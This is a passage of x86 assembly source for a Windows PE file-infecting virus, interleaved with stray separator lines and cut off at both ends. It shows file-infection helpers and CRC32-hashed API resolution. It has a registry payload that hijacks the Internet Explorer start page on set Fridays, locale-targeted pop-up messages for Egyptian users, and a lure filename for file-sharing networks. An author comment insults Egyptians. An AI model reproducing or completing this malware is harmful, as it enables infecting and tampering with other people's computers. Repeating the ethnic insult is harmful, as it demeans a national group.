push dword ptr [ebp+FileHandle]
|
|||
|
apicall _CloseHandle
|
|||
|
|
|||
|
CantOpen:
|
|||
|
push dword ptr [ebp+wfd.dwFileAttributes]
|
|||
|
lea eax,[ebp+wfd.cFileName]
|
|||
|
push eax
|
|||
|
apicall _SetFileAttributesA
|
|||
|
ret
|
|||
|
Align:
|
|||
|
push edx
|
|||
|
xor edx,edx
|
|||
|
push eax
|
|||
|
div ecx
|
|||
|
pop eax
|
|||
|
sub ecx,edx
|
|||
|
add eax,ecx
|
|||
|
pop edx
|
|||
|
ret
|
|||
|
|
|||
|
TruncFile:
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _SetFilePointer
|
|||
|
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _SetEndOfFile
|
|||
|
ret
|
|||
|
|
|||
|
OpenFile:
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000003h
|
|||
|
push eax
|
|||
|
inc eax
|
|||
|
push eax
|
|||
|
push 80000000h or 40000000h
|
|||
|
push edx ;esi
|
|||
|
apicall _CreateFileA
|
|||
|
ret
|
|||
|
|
|||
|
CreateMap:
|
|||
|
xor eax,eax
|
|||
|
push eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push 00000004h
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+FileHandle]
|
|||
|
apicall _CreateFileMappingA
|
|||
|
ret
|
|||
|
|
|||
|
MapFile:
|
|||
|
xor eax,eax
|
|||
|
push ecx
|
|||
|
push eax
|
|||
|
push eax
|
|||
|
push 00000002h
|
|||
|
push dword ptr [ebp+MapHandle]
|
|||
|
apicall _MapViewOfFile
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;
|
|||
|
; Get System Time
|
|||
|
;;;;;;;;;;;;;;;;;
|
|||
|
VxGetSystemTime:
|
|||
|
push ebp
|
|||
|
mov eax,offset st
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
call [_GetSystemTime+ebp]
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;
|
|||
|
; Get ModuleHandle
|
|||
|
;;;;;;;;;;;;;;;;;;
|
|||
|
VxGetModuleHandle:
|
|||
|
push ebp
|
|||
|
push eax
|
|||
|
call [_GetModuleHandleA+ebp]
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;
|
|||
|
; Get ProcAddress
|
|||
|
;;;;;;;;;;;;;;;;;
|
|||
|
VxGetProcAddress:
|
|||
|
push ebp
|
|||
|
push edx
|
|||
|
push eax
|
|||
|
call [_GetProcAddress+ebp]
|
|||
|
pop ebp
|
|||
|
ret
|
|||
|
|
|||
|
payload:
|
|||
|
call [ebp+_GetSystemDefaultLCID]
|
|||
|
and eax, 0FFFFh
|
|||
|
cmp eax, 0c01h ; Arabic (egypt) ?
|
|||
|
je arabic_payload
|
|||
|
call VxGetSystemTime
|
|||
|
cmp word ptr [ebp+wDayOfWeek], 5 ; friday
|
|||
|
jnz @@Endp
|
|||
|
cmp word ptr [ebp+wDay], 7
|
|||
|
jbe @@DoPayload
|
|||
|
cmp word ptr [ebp+wDay], 14
|
|||
|
jbe @@Endp
|
|||
|
cmp word ptr [ebp+wDay], 21
|
|||
|
ja @@Endp
|
|||
|
@@DoPayload:
|
|||
|
lea eax, [ebp+HandleOpenedKey]
|
|||
|
push eax
|
|||
|
push 000F003Fh
|
|||
|
push 0
|
|||
|
lea eax, [ebp+IExplorerKey]
|
|||
|
push eax
|
|||
|
push HKEY_CURRENT_USER
|
|||
|
call dword ptr [ebp+_RegOpenKeyExA]
|
|||
|
or eax, eax
|
|||
|
jnz @@Endp
|
|||
|
push pagesize
|
|||
|
lea eax, [ebp+page]
|
|||
|
push eax
|
|||
|
push 1
|
|||
|
push 0
|
|||
|
lea eax, [ebp+IExplorerValue]
|
|||
|
push eax
|
|||
|
push dword ptr [ebp+HandleOpenedKey]
|
|||
|
call dword ptr [ebp+_RegSetValueExA]
|
|||
|
|
|||
|
push dword ptr [ebp+HandleOpenedKey]
|
|||
|
call dword ptr [ebp+_RegCloseKey] ; Close key handle
|
|||
|
@@Endp:
|
|||
|
ret
|
|||
|
|
|||
|
arabic_payload:
|
|||
|
mov eax,100
|
|||
|
call rndeax
|
|||
|
cmp eax,3 ; a 4% probability of msg
|
|||
|
jbe doit
|
|||
|
ret
|
|||
|
doit:
|
|||
|
mov eax,((offset offsets_end-offsets)/4)-1
|
|||
|
call rndeax
|
|||
|
shl eax,2
|
|||
|
add eax,ebp
|
|||
|
add eax,offset offsets
|
|||
|
|
|||
|
push MB_ICONEXCLAMATION
|
|||
|
mov ebx,ebp
|
|||
|
add ebx,offset delta
|
|||
|
push ebx
|
|||
|
mov eax, dword ptr [eax]
|
|||
|
add eax,ebp
|
|||
|
push eax
|
|||
|
push L 0
|
|||
|
call [_MessageBoxA+ebp]
|
|||
|
ret
|
|||
|
|
|||
|
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
;Random Number generators
|
|||
|
;;;;;;;;;;;;;;;;;;;;;;;;;
|
|||
|
rndeax:
|
|||
|
push edx
|
|||
|
push ecx
|
|||
|
xor edx,edx
|
|||
|
push eax
|
|||
|
call random32
|
|||
|
pop ecx
|
|||
|
div ecx
|
|||
|
xchg eax, edx
|
|||
|
pop ecx
|
|||
|
pop edx
|
|||
|
ret
|
|||
|
|
|||
|
irandom32:
|
|||
|
call VxGetSystemTime
|
|||
|
mov ax,word ptr [st.wMilliseconds +ebp]
|
|||
|
shl eax,8
|
|||
|
mov dword ptr [ebp+lastrnd],eax
|
|||
|
ret
|
|||
|
|
|||
|
random32:
|
|||
|
push ecx
|
|||
|
xor ecx, ecx
|
|||
|
mov eax, dword ptr [ebp+lastrnd]
|
|||
|
mov cx, 33
|
|||
|
|
|||
|
rloop:
|
|||
|
add eax, eax
|
|||
|
jnc $+4
|
|||
|
xor al, 197
|
|||
|
loop rloop
|
|||
|
mov dword ptr [ebp+lastrnd], eax
|
|||
|
pop ecx
|
|||
|
ret
|
|||
|
|
|||
|
lastrnd dd 0h
|
|||
|
|
|||
|
;;;;;;;;;;;;
|
|||
|
; Data stuff
|
|||
|
;;;;;;;;;;;;
|
|||
|
a32_string db "ADVAPI32.dll",0
|
|||
|
regopen_string db "RegOpenKeyExA",0
|
|||
|
regget_string db "RegQueryValueExA",0
|
|||
|
close_string db "RegCloseKey",0
|
|||
|
Regset db "RegSetValueExA",0
|
|||
|
u32_string db "USER32.dll",0
|
|||
|
msgbox_string db "MessageBoxA",0
|
|||
|
|
|||
|
part2 db "\shell\open\command",0
|
|||
|
part2_len equ $-offset part2
|
|||
|
|
|||
|
prog_itself db "Applications\"
|
|||
|
prog_buffer db 100h dup (0)
|
|||
|
|
|||
|
desktop db "\Desktop",0
|
|||
|
|
|||
|
|
|||
|
fileee db "BaNGBUS RaNDOM PASSWORD GENERATOR.EXE",0
|
|||
|
; Could you have resisted such a file on kazaa ? ;)
|
|||
|
|
|||
|
avStrings dw 'VA','NA','RD','DI','DO','BT','-F'
|
|||
|
vStringsCout equ (offset $-offset avStrings)/2
|
|||
|
|
|||
|
page db 'http://www.touregypt.net',0
|
|||
|
|
|||
|
; Yeah , Come and visit egypt, beautiful country with asshole people ;-)
|
|||
|
|
|||
|
pagesize equ $ - offset page
|
|||
|
|
|||
|
IExplorerKey db 'Software\Microsoft\Internet Explorer\Main',0
|
|||
|
IExplorerValue db 'Start Page',0
|
|||
|
|
|||
|
lnk_match db "*.LNK",0
|
|||
|
exe_match dd "XE.*" xor "Shit" ; *.EXE
|
|||
|
db "E",0
|
|||
|
|
|||
|
|
|||
|
kernel32 dd 0BFF70000h
|
|||
|
@@NamezCRC32 label byte
|
|||
|
@FindFirstFileA dd 0AE17EBEFh
|
|||
|
@FindNextFileA dd 0AA700106h
|
|||
|
@FindClose dd 0C200BE21h
|
|||
|
@CreateFileA dd 08C892DDFh
|
|||
|
@DeleteFileA dd 0DE256FDEh
|
|||
|
@SetFilePointer dd 085859D42h
|
|||
|
@SetFileAttributesA dd 03C19E536h
|
|||
|
@CloseHandle dd 068624A9Dh
|
|||
|
@GetCurrentDirectoryA dd 0EBC6C18Bh
|
|||
|
@SetCurrentDirectoryA dd 0B2DBD7DCh
|
|||
|
@GetWindowsDirectoryA dd 0FE248274h
|
|||
|
@GetSystemDirectoryA dd 0593AE7CEh
|
|||
|
@CreateFileMappingA dd 096B2D96Ch
|
|||
|
@MapViewOfFile dd 0797B49ECh
|
|||
|
@UnmapViewOfFile dd 094524B42h
|
|||
|
@SetEndOfFile dd 059994ED6h
|
|||
|
@GetProcAddress dd 0FFC97C1Fh
|
|||
|
@LoadLibraryA dd 04134D1ADh
|
|||
|
@GetSystemTime dd 075B7EBE8h
|
|||
|
@GetModuleHandleA dd 082b618d4h
|
|||
|
@WriteFile dd 021777793h
|
|||
|
@GetFileSize dd 0ef7d811bh
|
|||
|
@GetFileAttributesA dd 0c633d3deh
|
|||
|
@VirtualAlloc dd 04402890eh
|
|||
|
@Sleep dd 00ac136bah
|
|||
|
@CreateThread dd 019f33607h
|
|||
|
@SetThreadPriority dd 01e533f17h
|
|||
|
@ResumeThread dd 06087961bh
|
|||
|
@lstrcmp dd 06ae4253bh
|
|||
|
@lstrcpy dd 0afd8ae51h
|
|||
|
@GetSystemDefaultLCID dd 04b410542h
|
|||
|
@SetFileTime dd 04B2A3E7Dh
|
|||
|
db 0BBh
|
|||
|
offsets:
|
|||
|
dd offset @1
|
|||
|
dd offset @2
|
|||
|
dd offset @3
|
|||
|
dd offset @4
|
|||
|
dd offset @5
|
|||
|
dd offset @6
|
|||
|
dd offset @7
|
|||
|
dd offset @8
|
|||
|
dd offset @9
|
|||
|
dd offset @10
|
|||
|
dd offset @11
|
|||
|
dd offset @12
|
|||
|
dd offset @13
|
|||
|
dd offset @14
|
|||
|
dd offset @15
|
|||
|
dd offset @16
|
|||
|
dd offset @17
|
|||
|
dd offset @18
|
|||
|
dd offset @19
|
|||
|
dd offset @20
|
|||
|
offsets_end:
|
|||
|
|
|||
|
; Funny messages in arabic for the arabic payload
|
|||
|
; you will not probably find them funny at all but they
|
|||
|
; make sense in arabic ;)
|
|||
|
|
|||
|
@1 db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> ",0
|
|||
|
; Is he speaking english , Morsi ?
|
|||
|
@2 db "<22><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD>Ϳ ",0
|
|||
|
; Did you aim at it , smartie ?
|
|||
|
@3 db "! <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>",0
|
|||
|
; It's all because i have a one hair !
|
|||
|
@4 db "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><> <20><><EFBFBD><EFBFBD> <20>",0
|
|||
|
; Who is it ? Mr Lotfi?! I can't believe it !
|
|||
|
@5 db "! <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD>",0
|
|||
|
; Please Tafida, you know that i love you so much, but i don't
|
|||
|
; support your mother !
|
|||
|
@6 db "<22> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
|||
|
; What's up with you Hamdi ? i already told you i am engaged
|
|||
|
@7 db "! <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>",0
|
|||
|
; Don't Cry your heart out, Tahani !
|
|||
|
@8 db "<22><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD>",0
|
|||
|
; How do you dare talk to me in such a manner, kid ?
|
|||
|
@9 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
|||
|
; String on string and thread on thread
|
|||
|
@10 db "! <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>",0
|
|||
|
; Give me my liberty, free my hands !
|
|||
|
@11 db "! <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
|||
|
; El-Lembii
|
|||
|
@12 db "! <20><> <20><> <20><><EFBFBD><EFBFBD> , <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD>",0
|
|||
|
; No Bouha, you can do everything but this !
|
|||
|
@13 db "! <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
|||
|
; Oh, you sexy smelling butter boxes !
|
|||
|
@14 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>",0
|
|||
|
; Gamal el dawly calls for resolving the football federation
|
|||
|
@15 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ",0
|
|||
|
; Gamal el dawly threatens Israel with the nuclear weapon !
|
|||
|
@16 db "<22><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> ",0
|
|||
|
; If El ahly is iron, zamalek would melt it !
|
|||
|
@17 db "! <20><><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>, <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
|||
|
; Please mohsen, if daddy finds out about it he will cut us into peaces !
|
|||
|
@18 db "! <20><> <20><><EFBFBD>, <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>... <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>",0
|
|||
|
; Son, it's your time to know the truth, you were born by artificial
|
|||
|
; fertilization !
|
|||
|
@19 db "<22> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20>",0
|
|||
|
; UGH ! who is knocking in such an hour ?
|
|||
|
@20 db "! <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>",0
|
|||
|
; Come on! I told you i am in need of sleep
|
|||
|
|
|||
|
|
|||
|
advapi32 dd ?
|
|||
|
_RegSetValueExA dd ?
|
|||
|
_RegOpenKeyExA dd ?
|
|||
|
_RegQueryValueExA dd ?
|
|||
|
_RegCloseKey dd ?
|
|||
|
HandleOpenedKey dd 0
|
|||
|
val2 db 0,0
|
|||
|
|
|||
|
buff_ dd 60h
|
|||
|
buff db 60h dup (0)
|
|||
|
|
|||
|
buff2_ dd 30h
|
|||
|
buff2 db 30h dup (0)
|
|||
|
|
|||
|
haddress dd ?
|
|||
|
hmap dd ?
|
|||
|
hfile dd ?
|
|||
|
ThreadID3 dd ?
|
|||
|
|
|||
|
olddir db 128 dup (0h)
|
|||
|
currdir db 128 dup (1h)
|
|||
|
|
|||
|
st SYSTEMTIME ?
|
|||
|
wfd WIN32_FIND_DATA ?
|
|||
|
search_handle dd ?
|
|||
|
search_handle2 dd ?
|
|||
|
|
|||
|
ori_attrib dd ?
|
|||
|
infect_counter dd ?
|
|||
|
|
|||
|
haddress2 dd ?
|
|||
|
hmap2 dd ?
|
|||
|
hfile2 dd ?
|
|||
|
user32 dd ?
|
|||
|
_MessageBoxA dd ?
|
|||
|
itd_va dd ?
|
|||
|
fsize_high dd ?
|
|||
|
new_filesize dd ?
|
|||
|
file_handle dd ?
|
|||
|
map_handle dd ?
|
|||
|
map_address dd ?
|
|||
|
pe_header dd ?
|
|||
|
last_entry dd ?
|
|||
|
file_align dd ?
|
|||
|
tmp_eip dd ?
|
|||
|
size_rawdata dd ?
|
|||
|
|
|||
|
kernel dd kernel_
|
|||
|
infections dd 00000000h
|
|||
|
NewSize dd 00000000h
|
|||
|
SearchHandle dd 00000000h
|
|||
|
FileHandle dd 00000000h
|
|||
|
MapHandle dd 00000000h
|
|||
|
MapAddress dd 00000000h
|
|||
|
AddressTableVA dd 00000000h
|
|||
|
NameTableVA dd 00000000h
|
|||
|
OrdinalTableVA dd 00000000h
|
|||
|
Counter dw 0000h
|
|||
|
|
|||
|
@@Offsetz label byte
|
|||
|
_FindFirstFileA dd 00000000h
|
|||
|
_FindNextFileA dd 00000000h
|
|||
|
_FindClose dd 00000000h
|
|||
|
_CreateFileA dd 00000000h
|
|||
|
_DeleteFileA dd 00000000h
|
|||
|
_SetFilePointer dd 00000000h
|
|||
|
_SetFileAttributesA dd 00000000h
|
|||
|
_CloseHandle dd 00000000h
|
|||
|
_GetCurrentDirectoryA dd 00000000h
|
|||
|
_SetCurrentDirectoryA dd 00000000h
|
|||
|
_GetWindowsDirectoryA dd 00000000h
|
|||
|
_GetSystemDirectoryA dd 00000000h
|
|||
|
_CreateFileMappingA dd 00000000h
|
|||
|
_MapViewOfFile dd 00000000h
|
|||
|
_UnmapViewOfFile dd 00000000h
|
|||
|
_SetEndOfFile dd 00000000h
|
|||
|
_GetProcAddress dd 00000000h
|
|||
|
_LoadLibraryA dd 00000000h
|
|||
|
_GetSystemTime dd 00000000h
|
|||
|
_GetModuleHandleA dd 00000000h
|
|||
|
_WriteFile dd 00000000h
|
|||
|
_GetFileSize dd 00000000h
|
|||
|
_GetFileAttributesA dd 00000000h
|
|||
|
_VirtualAlloc dd 00000000h
|
|||
|
_Sleep dd 00000000h
|
|||
|
_CreateThread dd 00000000h
|
|||
|
_SetThreadPriority dd 00000000h
|
|||
|
_ResumeThread dd 00000000h
|
|||
|
_lstrcmp dd 00000000h
|
|||
|
_lstrcpy dd 00000000h
|
|||
|
_GetSystemDefaultLCID dd 00000000h
|
|||
|
_SetFileTime dd 00000000h
|
|||
|
|
|||
|
|
|||
|
; This is a compressed exe file, it will display a faked username
|
|||
|
; and password for bangbus when run, included is it's assembly
|
|||
|
|
|||
|
dropstart:
|
|||
|
db |